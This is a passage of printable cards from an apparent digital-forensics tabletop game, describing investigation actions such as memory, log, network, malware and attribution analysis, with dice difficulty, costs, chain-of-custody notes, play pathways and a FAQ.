║ and storage sectors overwritten. Uses specialized tools like   ║
║ EnCase, FTK, or open-source carving tools.                    ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Deleted malware (recovered from free space)                  ║
║ - Temporary files (attacker staging data before exfil)         ║
║ - Encryption keys or passphrases (memory remnants on disk)     ║
║ - Hidden partitions or file systems                            ║
║ - Slack space artifacts                                        ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover ONE Evidence card from: Deep Malware Samples,         ║
║ Encryption Keys Found, or Hidden Backdoor evidence.            ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Chain of Custody +10%                       ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Discover partial data (e.g., fragments of deleted file).       ║
║ Advance: Attack Chain +10%, Chain of Custody +5%               ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Data too corrupted or already overwritten. No recovery.        ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Carving is technically sound but must be documented carefully. ║
║ Chain of Custody: Strong if done by certified analyst.         ║
║ ⚠ Partial carving may be challenged in court (incomplete       ║
║   file recovery). Recommend combining with other techniques.   ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has GCFE (Certified Forensic Examiner)      ║
║ +1 if investigator has disk forensics experience               ║
║ +1 if combined with DISK-01 investigation already done         ║
║ -1 if SSD drives present (wear-leveling complicates carving)   ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Expensive investigation (15 budget) for specialized work     ║
║ • Can take weeks in real incidents; represented as 3 turns     ║
║ • Most valuable for discovering deleted persistence and        ║
║   encryption keys                                              ║
║ • Less effective on modern systems with TRIM/wear-leveling     ║
╚════════════════════════════════════════════════════════════════╝

MEM-01: Memory Dump & Analysis

╔════════════════════════════════════════════════════════════════╗
║              MEM-01: MEMORY DUMP & ANALYSIS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Volatile Memory Forensics (RAM analysis)            ║
║ MITRE ATT&CK: T1055 (Process Injection), T1057 (Process        ║
║              Discovery), T1518 (Software Discovery)            ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Capture RAM (volatile memory) from running system during       ║
║ incident response, then analyze for active processes, malware, ║
║ injected code, network connections, and encryption keys in     ║
║ memory. Uses tools like Volatility, Rekall, or proprietary     ║
║ memory analysis suites.                                        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Malware processes running in memory                          ║
║ - Injected code (shellcode, DLLs in unexpected processes)      ║
║ - Network connections (established C2 connections)             ║
║ - Encryption keys and credentials in memory                    ║
║ - Command history from interactive shells                      ║
║ - Rootkit or kernel-level hooks                                ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card from: Active Malware Process,       ║
║ C2 Connection, or Injected Code evidence.                      ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Timeline Completeness +10%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Discover evidence of suspicious process (incomplete details).  ║
║ Advance: Attack Chain +10%, Timeline Completeness +5%          ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Malware may use anti-forensics in memory; analysis inconclusive║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Memory capture is volatile and must be done immediately.       ║
║ Chain of Custody: Strong if documented with timestamps.        ║
║ ✓ Admissible, but include disclaimer about volatile nature    ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator trained in memory forensics (Volatility)    ║
║ +1 if malware analysis background                              ║
║ +1 if Analyze Evidence action previously discovered malware    ║
║ -2 if memory was overwritten before capture (time-sensitive)   ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Time-critical: Memory is lost if system is rebooted          ║
║ • Reveals active threats that may not exist on disk            ║
║ • Combines process discovery with malware analysis             ║
║ • Most valuable for finding active C2 connections              ║
╚════════════════════════════════════════════════════════════════╝

MEM-02: Memory Forensics Deep Dive

╔════════════════════════════════════════════════════════════════╗
║              MEM-02: MEMORY FORENSICS DEEP DIVE                ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Volatile Memory Analysis                   ║
║ MITRE ATT&CK: T1112 (Modify Registry), T1055 (Process          ║
║              Injection), T1140 (Deobfuscate/Decode Files)      ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15                                           ║
║ Budget Cost: 20                                                ║
║ Duration: 3 turns (expert-level analysis)                      ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Expert-level memory analysis including malware behavior        ║
║ simulation, deobfuscation of shellcode, reverse engineering    ║
║ of code injected into memory, and recovery of encryption keys. ║
║ Requires deep expertise in assembly language, malware tactics, ║
║ and memory layouts.                                            ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Obfuscated/encrypted malware payloads (deobfuscate them)     ║
║ - Code injection techniques (understand HOW malware hides)     ║
║ - Encryption keys and passphrases in memory (crypto recovery)  ║
║ - Malware command history (recent attacker commands)           ║
║ - Process hollowing or code caves (anti-analysis techniques)   ║
║ - Privilege escalation vulnerabilities in use                  ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15):                                        ║
║ Discover TWO Evidence cards: One from malware behavior set     ║
║ (e.g., Encryption Keys, Command History) + one from attack     ║
║ technique set (e.g., Code Injection Method, Exploitation Used).║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +25%, Attribution +20%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 13-14):                                  ║
║ Discover ONE complete Evidence + incomplete second evidence.   ║
║ Advance: Attack Chain +15%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 13):                                           ║
║ Malware uses sophisticated anti-analysis; analysis fails.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Analysis documentation critical (how did you reach conclusions)║
║ Chain of Custody: Strong if reverse engineering is documented. ║
║ ⚠ Conclusions must be explained clearly for court admissibility║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +3 if investigator has GCFA (Certified Forensic Analyst)       ║
║ +2 if malware reverse engineering background                   ║
║ +1 if Malware Analysis card already completed                  ║
║ +1 if detailed explanation of deobfuscation approach           ║
║ -2 if malware is heavily obfuscated or virtualized             ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most expensive memory analysis (20 budget)                   ║
║ • Requires reverse engineering expertise                       ║
║ • Discovers "why" the malware works, not just "what"          ║
║ • Essential for understanding sophisticated attacks            ║
║ • Can take weeks in real investigations; represented as 3 turns║
╚════════════════════════════════════════════════════════════════╝

LOG-01: Event Log Analysis

╔════════════════════════════════════════════════════════════════╗
║              LOG-01: EVENT LOG ANALYSIS                        ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Windows/Linux Log Examination                       ║
║ MITRE ATT&CK: T1552 (Unsecured Credentials), T1098 (Account    ║
║              Manipulation)                                     ║
║              T1021 (Remote Services), T1078 (Valid Accounts)   ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 11                                           ║
║ Budget Cost: 5                                                 ║
║ Duration: 1 turn                                               ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Analyze system event logs (Windows Event Log, syslog, etc.)    ║
║ to identify user logins, privilege escalations, file access,   ║
║ and process execution. This is foundational and relatively     ║
║ quick—useful for establishing a basic timeline.                ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Failed login attempts (brute force evidence)                 ║
║ - Successful logins from unusual locations/times               ║
║ - Privilege escalation attempts (RunAs, sudo)                  ║
║ - Process creation events                                      ║
║ - Service installation events                                  ║
║ - File access to sensitive files                               ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 11):                                        ║
║ Discover ONE Evidence card from: Suspicious Login Timeline,    ║
║ Privilege Escalation Attempt, or Service Installation evidence.║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +15%, Attack Chain +10%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 9-10):                                   ║
║ Discover partial timeline (logs are fragmented or unclear).    ║
║ Advance: Timeline Completeness +5%, Attack Chain +5%           ║
║                                                                 ║
║ FAILURE (roll < 9):                                            ║
║ Logs were deleted or corrupted; no useful evidence.            ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Logs must be exported with metadata (timestamps, user context).║
║ Chain of Custody: Strong if logs are digitally signed.         ║
║ ✓ Admissible in court (widely accepted evidence type)         ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +1 if investigator has Windows administration experience       ║
║ +1 if investigator has SIEM/log analysis background            ║
║ +1 if detailed explanation of log analysis approach            ║
║ +2 if prior Timeline Reconstruction investigation completed    ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Cheapest investigation (5 budget) - good starting point      ║
║ • Fastest (1 turn) - can be done early in investigation        ║
║ • Foundation for Timeline Reconstruction and Log Correlation   ║
║ • May be ineffective if attacker deleted logs (add anti-forensics penalty: +2 DC)  ║
╚════════════════════════════════════════════════════════════════╝

LOG-02: Deep Log Correlation

╔════════════════════════════════════════════════════════════════╗
║              LOG-02: DEEP LOG CORRELATION                      ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Cross-System Log Analysis & Correlation             ║
║ MITRE ATT&CK: T1087 (Account Discovery), T1021 (Remote Services)║
║              T1083 (File and Directory Discovery)              ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Correlate logs from multiple systems (servers, firewalls, IDS, ║
║ proxies, domain controllers) to build a complete timeline of   ║
║ attacker lateral movement and actions across the environment.  ║
║ Requires SIEM expertise or manual correlation tools.           ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Lateral movement pattern (login on A → login on B → etc)     ║
║ - Privilege escalation sequence (user to admin to system)      ║
║ - Command execution across systems                             ║
║ - Network connections (firewall → host activity)               ║
║ - Timeline of data access and exfiltration                     ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card from: Lateral Movement Pattern,     ║
║ Complete Attack Timeline, or Attacker Command Sequence.        ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +20%, Attack Chain +25%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Discover partial timeline (some systems missing logs).         ║
║ Advance: Timeline Completeness +15%, Attack Chain +10%         ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Too many log gaps; timeline cannot be reliably correlated.     ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Correlation requires clear documentation of methodology.       ║
║ Chain of Custody: Strong if SIEM tool provided audit trail.    ║
║ ✓ Admissible if correlation process is documented clearly     ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has SIEM administration (Splunk, ArcSight) ║
║ +1 if LOG-01 already completed (building on prior analysis)    ║
║ +1 if detailed explanation of correlation methodology         ║
║ +2 if team provides narrative of suspected attacker movements  ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most valuable for understanding "how" attacker moved         ║
║ • Reveals attack pace and duration (dwell time)                ║
║ • Can expose failed lateral movement attempts                  ║
║ • Requires multiple systems to have logging enabled            ║
╚════════════════════════════════════════════════════════════════╝

NET-01: Network Traffic Analysis

╔════════════════════════════════════════════════════════════════╗
║              NET-01: NETWORK TRAFFIC ANALYSIS                  ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Packet Capture & Flow Analysis                      ║
║ MITRE ATT&CK: T1041 (Exfiltration Over C2), T1048 (Alternative ║
║              Protocol), T1071 (Application Layer Protocol)     ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Analyze network traffic captures (PCAP) or network flow records║
║ (NetFlow) to identify communication patterns, exfiltration     ║
║ evidence, and command-and-control connections. Uses tools like ║
║ Wireshark, Zeek, or commercial traffic analysis platforms.    ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Unusual outbound connections (C2 domains, IPs)               ║
║ - Large data transfers (exfiltration evidence)                 ║
║ - Encrypted tunnels (VPN, proxy connections)                   ║
║ - DNS queries for suspicious domains                           ║
║ - HTTP user agents inconsistent with legitimate software       ║
║ - Beacon-like patterns (regular connection attempts)           ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: C2 Server Evidence,           ║
║ Exfiltration Traffic Pattern, or Suspicious Domain Lookup.     ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +15%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 10-11):                                  ║
║ Discover suspicious traffic but destination unclear.           ║
║ Advance: Attack Chain +10%, Attribution +5%                    ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ Traffic too encrypted or obfuscated; cannot analyze.           ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ PCAP files must include timestamp and collection metadata.     ║
║ Chain of Custody: Strong if collected from router/IDS.         ║
║ ✓ Admissible (widely accepted for network evidence)           ║
║ ⚠ Encrypted traffic reveals patterns but not content           ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has Wireshark/packet analysis certification ║
║ +1 if network engineering background                           ║
║ +1 if Threat Attribution evidence already discovered           ║
║ -1 if traffic is heavily encrypted or anonymized              ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Reveals attacker communication patterns                      ║
║ • Can identify C2 infrastructure                               ║
║ • Exfiltration volume is critical evidence                     ║
║ • Encrypted traffic is harder to analyze but patterns visible  ║
╚════════════════════════════════════════════════════════════════╝

NET-02: Packet Capture Deep Analysis

╔════════════════════════════════════════════════════════════════╗
║              NET-02: PACKET CAPTURE DEEP ANALYSIS              ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Protocol Forensics & Reconstruction        ║
║ MITRE ATT&CK: T1557 (Adversary-in-the-Middle), T1040 (Network ║
║              Sniffing), T1071 (Application Layer Protocol)     ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 3 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Deep packet inspection including protocol reconstruction       ║
║ (rebuilding HTTP streams, email messages, file transfers from  ║
║ packet payloads), malware traffic analysis, and detection of   ║
║ exploitation attempts in traffic. Requires advanced networking  ║
║ and protocol knowledge.                                        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Reconstructed HTTP/S traffic (actual data transferred)       ║
║ - Exploitation payloads in network traffic (shellcode, etc)    ║
║ - Malware command protocols (custom C2 protocols)              ║
║ - Authentication attempts (credentials in transit)             ║
║ - Man-in-the-middle evidence (SSL/TLS downgrade, cert mismatches)║
║ - Attacker reconnaissance traffic patterns                     ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover TWO Evidence cards from: Exploitation Traffic,        ║
║ C2 Protocol Details, or Attacker Reconnaissance Pattern.       ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +25%, Attribution +25%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Discover ONE complete evidence + incomplete second.            ║
║ Advance: Attack Chain +15%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Encryption or obfuscation prevents useful reconstruction.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ PCAP reconstruction must document decoding methodology.        ║
║ Chain of Custody: Moderate (depends on decoding assumptions).  ║
║ ⚠ If encrypted traffic decoded, must explain decryption method║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has network forensics certification         ║
║ +2 if protocol reverse engineering experience                  ║
║ +1 if NET-01 already completed (building on analysis)          ║
║ -2 if traffic is encrypted and keys not recovered              ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Most detailed network analysis (3 turns)                     ║
║ • Requires protocol expertise (HTTP, DNS, custom protocols)    ║
║ • Reveals actual attacker commands and data stolen             ║
║ • Challenging when traffic is encrypted                        ║
╚════════════════════════════════════════════════════════════════╝

MALW-01: Malware Analysis (Dynamic)

╔════════════════════════════════════════════════════════════════╗
║              MALW-01: MALWARE ANALYSIS (DYNAMIC)               ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Behavioral Malware Analysis                         ║
║ MITRE ATT&CK: T1518 (Software Discovery), T1082 (System Info), ║
║              T1012 (Query Registry), T1033 (System Owner/User)  ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Execute malware samples in an isolated sandbox environment     ║
║ and record their behavior. Monitor file system changes, registry║
║ modifications, network connections, and process creation to    ║
║ understand what the malware does without reverse engineering.  ║
║ Uses tools like Cuckoo, Any.run, or commercial sandboxes.     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - File system changes (what files created/modified)            ║
║ - Registry modifications (persistence mechanisms)              ║
║ - Network communications (DNS, HTTP, etc connections)          ║
║ - Process creation (child processes, injections)               ║
║ - System enumeration (reconnaissance activity)                 ║
║ - Anti-analysis techniques (checks for sandbox)                ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: Malware Behavior Profile,     ║
║ Persistence Mechanism Created, or C2 Callback Observed.        ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +10%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 10-11):                                  ║
║ Malware behavior observed but some details unclear.            ║
║ Advance: Attack Chain +10%, Attribution +5%                    ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ Malware detects sandbox; exhibits anti-analysis behavior.      ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Sandbox execution creates video/log recordings of behavior.    ║
║ Chain of Custody: Strong if sandbox logs are preserved.        ║
║ ✓ Admissible (widely accepted malware analysis evidence)      ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +1 if incident responder with malware analysis training        ║
║ +1 if detailed explanation of behavioral analysis approach     ║
║ -1 if malware implements anti-sandbox techniques               ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Safer than static analysis (execution is isolated)           ║
║ • Reveals "what the malware does" not "how it works"          ║
║ • Complements Static Analysis (MALW-02) well                  ║
║ • Useful for identifying persistence and C2 behavior           ║
╚════════════════════════════════════════════════════════════════╝

MALW-02: Malware Analysis (Static)

╔════════════════════════════════════════════════════════════════╗
║              MALW-02: MALWARE ANALYSIS (STATIC)                ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Code Reverse Engineering & Analysis                 ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode Files), T1027          ║
║              (Obfuscated Files or Information), T1071          ║
║              (Application Layer Protocol)                      ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Disassemble and analyze malware code without execution using   ║
║ reverse engineering tools (IDA Pro, Ghidra, Binary Ninja, etc).║
║ Examine assembly code, strings, imports, and code structure to ║
║ understand attacker capabilities and techniques. Requires      ║
║ assembly language and debugging expertise.                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Hardcoded C2 servers, encryption keys                        ║
║ - Malware capabilities (spyware, RAT, backdoor, etc)           ║
║ - Obfuscation techniques (packing, encryption, polymorphism)   ║
║ - Code similarities to known malware families                  ║
║ - Exploit codes (zero-days, known CVEs)                        ║
║ - Attacker identity clues (developer name, code style)         ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14):                                        ║
║ Discover ONE Evidence card from: Malware Source Code Analysis, ║
║ Hardcoded C2 Server, or Code Similarity to Known Family.       ║
║ Advance (only if no Evidence card produced):                   ║
║ Attack Chain +20%, Attribution +25%                            ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 12-13):                                  ║
║ Understand some code features but full analysis incomplete.    ║
║ Advance: Attack Chain +10%, Attribution +10%                   ║
║                                                                 ║
║ FAILURE (roll < 12):                                           ║
║ Malware is heavily obfuscated; code analysis inconclusive.     ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Reverse engineering analysis is documented with screenshots    ║
║ Chain of Custody: Moderate (interpretation-dependent).         ║
║ ⚠ Conclusions must be clearly explained for admissibility     ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +3 if investigator has GREM (GIAC Reverse Engineering Malware) ║
║ +2 if assembly language and debugging expertise                ║
║ +1 if MALW-01 already completed (building on behavioral findings)║
║ +1 if detailed explanation of reverse engineering approach     ║
║ -2 if malware is polymorphic/heavily obfuscated                ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Highest skill requirement (DC 14)                            ║
║ • Reveals "how the malware works"                              ║
║ • Can identify code reuse and attacker patterns                ║
║ • Complements Behavior Analysis (MALW-01) well                ║
║ • Time-consuming (2 turns represents weeks of analysis)        ║
╚════════════════════════════════════════════════════════════════╝

TIMELINE-01: Timeline Reconstruction

╔════════════════════════════════════════════════════════════════╗
║              TIMELINE-01: TIMELINE RECONSTRUCTION              ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Event Correlation & Chronological Analysis          ║
║ MITRE ATT&CK: T1074 (Data Staged), T1087 (Account Discovery), ║
║              T1046 (Network Service Discovery)                 ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13                                           ║
║ Budget Cost: 5                                                 ║
║ Duration: 1 turn                                               ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Synthesize evidence from multiple sources (logs, timestamps,   ║
║ file metadata, malware analysis) into a unified chronological  ║
║ timeline of the attack. Identify sequence of events, dwell     ║
║ time, and decision points.                                     ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Entry point and initial compromise time                      ║
║ - Privilege escalation points and timing                       ║
║ - Lateral movement sequence                                    ║
║ - Data reconnaissance timeline                                 ║
║ - Exfiltration timing (when, how much, for how long)           ║
║ - Dwell time (how long attacker in network before detection)   ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13):                                        ║
║ Discover ONE Evidence card: Complete Attack Timeline with      ║
║ key decision points and transitions between phases identified. ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +25%, Attack Chain +15%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 11-12):                                  ║
║ Partial timeline with some events missing or unclear.          ║
║ Advance: Timeline Completeness +15%, Attack Chain +10%         ║
║                                                                 ║
║ FAILURE (roll < 11):                                           ║
║ Too many timestamp discrepancies; timeline unreliable.         ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Timeline must reference source evidence for each event.        ║
║ Chain of Custody: Strong if well-documented and cross-referenced║
║ ✓ Admissible if timeline sources are cited                    ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator is DFIR (Digital Forensics & Incident Response)║
║ +1 if LOG-01 or LOG-02 already completed                       ║
║ +2 if detailed explanation synthesizes multiple evidence sources║
║ +1 if team notes discrepancies and explains them               ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Critical for understanding attack progression                ║
║ • Cheap (5 budget) but requires multiple prior investigations  ║
║ • Fast (1 turn) but depends on prior evidence collection       ║
║ • Foundation for narrative reconstruction of incident          ║
╚════════════════════════════════════════════════════════════════╝

THREAT-01: Threat Attribution Analysis

╔════════════════════════════════════════════════════════════════╗
║              THREAT-01: THREAT ATTRIBUTION ANALYSIS            ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Threat Intelligence & Attribution                   ║
║ MITRE ATT&CK: G#### group / S#### software identification      ║
║              Requires synthesis of all prior evidence           ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15                                           ║
║ Budget Cost: 20                                                ║
║ Duration: 3 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Synthesize all collected evidence (malware, infrastructure,    ║
║ tactics, timeline, timeline) to attribute the attack to a      ║
║ known threat group, nation-state, or attacker profile. Includes║
║ cross-referencing with threat intelligence databases, academic ║
║ papers, and law enforcement data. This is the highest-level    ║
║ attribution analysis.                                          ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Similar attacks in CTI databases (VirusTotal, OSINT, etc)   ║
║ - Malware signatures matching known threat groups              ║
║ - Tactics & Techniques (TTPs) matching known profiles          ║
║ - Infrastructure (domains, IPs) linked to known campaigns      ║
║ - Language/coding style hints about attacker origin            ║
║ - Geolocation clues from timestamps and infrastructure         ║
║ - Victim profile matching known group targeting patterns       ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15):                                        ║
║ Discover ONE Evidence card: Threat Attribution Report with     ║
║ confidence level (60-90%) linking to specific threat group.    ║
║ Advance (only if no Evidence card produced):                   ║
║ Attribution Confidence +35%, Attack Chain +10%                 ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 13-14):                                  ║
║ Partial attribution (likely group/profile but not 100% certain)║
║ Advance: Attribution Confidence +25%, Attack Chain +5%         ║
║                                                                 ║
║ FAILURE (roll < 13):                                           ║
║ Insufficient evidence for reliable attribution.                ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Attribution must cite specific evidence for each finding.      ║
║ Chain of Custody: Moderate (depends on CTI source reliability) ║
║ ⚠ Confidence level must be documented (70% vs. 90% certainty) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has threat intelligence background          ║
║ +1 if access to premium CTI services (CrowdStrike, Mandiant)  ║
║ +1 per prior investigation showing strong evidence patterns    ║
║ +2 if detailed narrative synthesizes multiple evidence sources ║
║ -2 if evidence is sparse or conflicting                        ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Highest difficulty (DC 15) requires extensive prior evidence ║
║ • Cannot be done until sufficient evidence collected           ║
║ • Most valuable action for reaching Victory Condition 1        ║
║ • Attribution confidence matters: 60% vs. 95% is significant   ║
║ • Final step in forensic investigation                         ║
╚════════════════════════════════════════════════════════════════╝

Printable Format

How to Print Cards

Materials Needed: - Cardstock (250 gsm minimum) - Card sleeves (optional but recommended) - Scissors or guillotine cutter - Ruler and cutting mat

Printing Instructions: 1. Print each card on heavy cardstock (250 gsm) 2. Cut along the border (approx. 3.5" x 5.5" for standard card size) 3. Optional: Laminate for durability 4. Optional: Sleeve cards for shuffling and handling

PDF Layout: [Card layout with 4-6 cards per page will be generated separately in printable PDF format]


Card Combination & Strategy

Investigation Pathways

Pathway 1: Quick Start (Turns 1-3) - LOG-01 (Event Log Analysis) → Timeline Reconstruction → Identify key events

Pathway 2: Deep Evidence (Turns 1-5) - DISK-01 (Disk Image) → MALW-01 (Dynamic Analysis) → MALW-02 (Static Analysis) → Understand full malware

Pathway 3: Network-Based (Turns 1-5) - LOG-01 (Initial timeline) → NET-01 (Network Traffic) → NET-02 (Deep Packet Analysis) → Reconstruct C2

Pathway 4: Attribution (Turns 1-6) - MALW-01/02 → NET-01 → THREAT-01 → Complete attribution with infrastructure evidence


FAQ

Q: Can I do these investigations in any order? A: Yes, but some combinations are more efficient. Multiple investigations often support each other.

Q: What's the DC difficulty based on? A: Skill required. Easier investigations (LOG-01, TIMELINE-01) have DC 11-13. Complex investigations (MEM-02, THREAT-01) have DC 14-15.

Q: Why do some investigations take 3 turns? A: They represent weeks of real forensic work compressed into game turns. Mechanically (v2.2): pay the cost and use your action on the turn you start; the roll and results arrive at the start of the turn the Duration completes. Only one multi-turn investigation may be in flight at a time.

Q: What modifiers apply to my roll? A: Skill (+1 to +3), narrative explanation (+1 to +2), prior investigations (+1), challenge circumstances (-1 to -2).


Version History

cards/forensics/core-deck/evidence-cards.md

Forensics Module: Evidence & Findings Cards (Core Deck)

Version: 2.2 - Playtest Edition Card Count: 12 Evidence Cards + 4 Findings Cards = 16 Total Printable: Yes


Overview

